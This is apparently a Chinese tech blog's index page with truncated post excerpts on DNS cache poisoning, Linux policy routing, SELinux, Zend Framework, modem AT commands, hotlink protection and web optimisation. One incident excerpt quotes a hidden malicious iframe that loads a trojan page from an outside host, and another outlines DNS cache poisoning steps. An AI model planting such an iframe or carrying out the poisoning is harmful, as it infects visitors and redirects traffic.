最近爆出的DNS Cache中毒漏洞结合了QueryID猜测和DNS处理回应包的附加区域(ADDITIONAL SECTION)漏洞来实施的。具体的攻击过程:
1. 向受攻击的DNS服务器发送大量的查询请求,域名的主机部分可以是随机的,如xxy123.test.com, xxy124.test.com等等。
2.发出20倍的回应给攻击的DNS服务器,用来猜测DNS服务器发送给test.com域名服务器的QUERY ID,并且这些回应的附加区域填写www.aaa.com. 172442 IN &nb ...
由于众所周知的网通、电信问题,需要在双线机房托管WEB服务器。网通与电信的用户在做DNS解析时获得各自对应的IP地址,从而实现WEB浏览者快速访问WEB Server。如果WEB Server本身要访问电信或网通的IP地址,那么怎么实现路由的自动选择呢?
Linux系统发展的策略路由完全可以实现。首先设置系统的缺省路由为电信的网关地址,对网通做策略路由。方法如下:
1. 编辑/etc/iproute2/rt_table, 增加一个路由表名称:
$ cat /etc/ ...
昨天突然接到一个自称微软中国总部的小姐打过来的电话,说是微软正版软件事业部的。通过某种途径得知我们用的Office软件是非授权软件(没有直说盗版软件,呵呵),微软现在推行软件正版化,国家各相关部委支持,要推进奥运前的中国中小企业软件的正版化等等。说如果购买正版软件可以推荐当地经销商,价格优惠等等。如果不购买正版授权,将会同版权局、工商局等上门查封电脑,检查是否含有非授权Office软件。并且微软有强大的律师团来处理此类的法律纠纷。总之是一番威逼利诱啊。看来微软的政府公关能力真的很强哦。
我们单 ...
- 09:03
- 浏览 (48)
- 评论 (0)
RHEL5.1的selinux缺省配置只允许MySQL Server侦听3306端口。为了增加MySQL侦听其它端口的服务,需要用semanage命令来设置MySQL Server的侦听许可。下面的命令允许mysqld侦听3333端口:sudo /usr/sbin/semanage port -a -t mysqld_port_t -p tcp 3333如果mysql的data目录不是标准的/var/lib/mysql(如/data/mysql),那么同样可以通过semanage管理目录的缺省权限:sudo /usr/sbin/semanage fcontext -a -t mysqld_db ...
上一篇Blog记录了通过Controller Plugin根据HTTP ACCEPT选择性地出现不同的模板,RESTful API是通过HTTP METHOD(GET, POST, PUT, DELETE等)来选择执行不同的动作。同样通过Plugin可以将不同的HTTP METHOD分派给不同的Action来处理。修改后的Plugin如下:<?php
/**
* Choose correct view for RESTful client
*
* @author lht
* @version
*/
final class Restful extend ...
- 15:48
- 浏览 (90)
- 评论 (0)
使用ZF1.0的时候发现它的MVC模式的view模板缺省为phtml,而REST接口要求根据客户要求Accept协议头返回不同格式的结果。考察了一下整个Framework,发现可以用Plugin简单地实现不同View模板的选择。下面是Plugin的代码:<?php
/**
* Choose correct view for RESTful client
*
* @author lht
* @version
*/
final class Restful extends Zend_Controller_Plugin_Abstract {
pub ...
- 17:23
- 浏览 (99)
- 评论 (0)
花费了一天的时间开发了一个CDMA MODEM的短信收发程序。可以向指定的号码发送一条短信并接收对方的回应。
开发过程用自己熟悉的DELPHI来做,一切都轻车熟路,但在设置短信到达通知方式的时候发现了:
AT+CNMI=2,1,0,1,0 与 AT+CNMI=2,2,0,1,0对于状态报告的返回有细微的不同。前者通过+CMTI指令通知给应用程序。其中+CMTI会指明接收的短信的index号码,然后程序通过AT+CMGR=INDEX读取短信到程序中。这时MODEM会正常返回状态报告给对方。然而后面一种设置方式是MODEM在收到短信后直接通过+CMT指令通知给程序。+CMT指令包含有短信内容,程序 ...
公司旗下的一个多媒体原创网站最近流量突然猛增,以至于IDC的网关打电话过来警告,说是带宽占用超过限额了。赶紧查看网站日志,发现很多http referer来自http://box.zhangmen.baidu.com/m、http://www.yizi520.com/qqplayer/cmp.swf的访问,并且是直接指向我们的mp3文件的。上网一查,原来是臭名昭著的百度音乐盒和MP3搜索。我们的实际MP3文件路径是做过技术处理的,不会在网页中暴露的,除非对我们的页面做了人工的反向工程。赶紧做防盗链处理:RewriteEngine OnRewriteCond %{HTTP_REFERER} ! ...
今天在接机的路上接到同事电话说网站打开后乱码。同事怀疑受到病毒感染。但是在本机上用curl查看html内容是正常的,初步怀疑是被ARP攻击篡改缺省网关地址,然后挂马。下午一到公司就用curl在其它PC上面查看服务器的内容:
$ curl -i http://www.unknowndns.com/
然后看到content-type正常,html内容的头部被加上:
<iframe src=http://sina8488.com/admin/a93.htm width=20 height=0 frameborder=0></iframe>
从而导致网页乱码,一查真的是木马。赶紧上服务器查 ...
下面的优化项目来自Yahoo!网站优化负责人的新书:1. 减少HTTP请求2. 采用CDN3. 加入Expires HTTP头4. Gzip压缩5. CSS放在顶部6. JS放在底部7. 避免CSS表达式8. 将CSS和JS放到外部文件9. 减少DNS查询10. 缩减JS尺寸11. 避免重定向12. 删除重复JS13. 关闭ETags14. 使AJAX可缓存并小
- 17:30
- 浏览 (160)
- 评论 (1)
lht
- 浏览: 4123 次
- 详细资料
搜索本博客
最近加入圈子
最新评论
-
高性能WEB网站优化项目
这话,你理解啦吗?
-- by guojingxf -
很暴力很变态的百度MP3盗 ...
一般的最终用户是很少伪造referer的,都是通过WEB服务器给出的页面上的音乐 ...
-- by lht -
很暴力很变态的百度MP3盗 ...
同情一下…… 百度里一半律师,一半是强盗
-- by Christ -
很暴力很变态的百度MP3盗 ...
冷。。。为test.cn所承受的ddos攻击而悲哀一下~~~
-- by lordhong -
很暴力很变态的百度MP3盗 ...
要是伪造referer的话,还有没有其他有效放盗链的手段呢?看看Lighttpd ...
-- by robbin
评论排行榜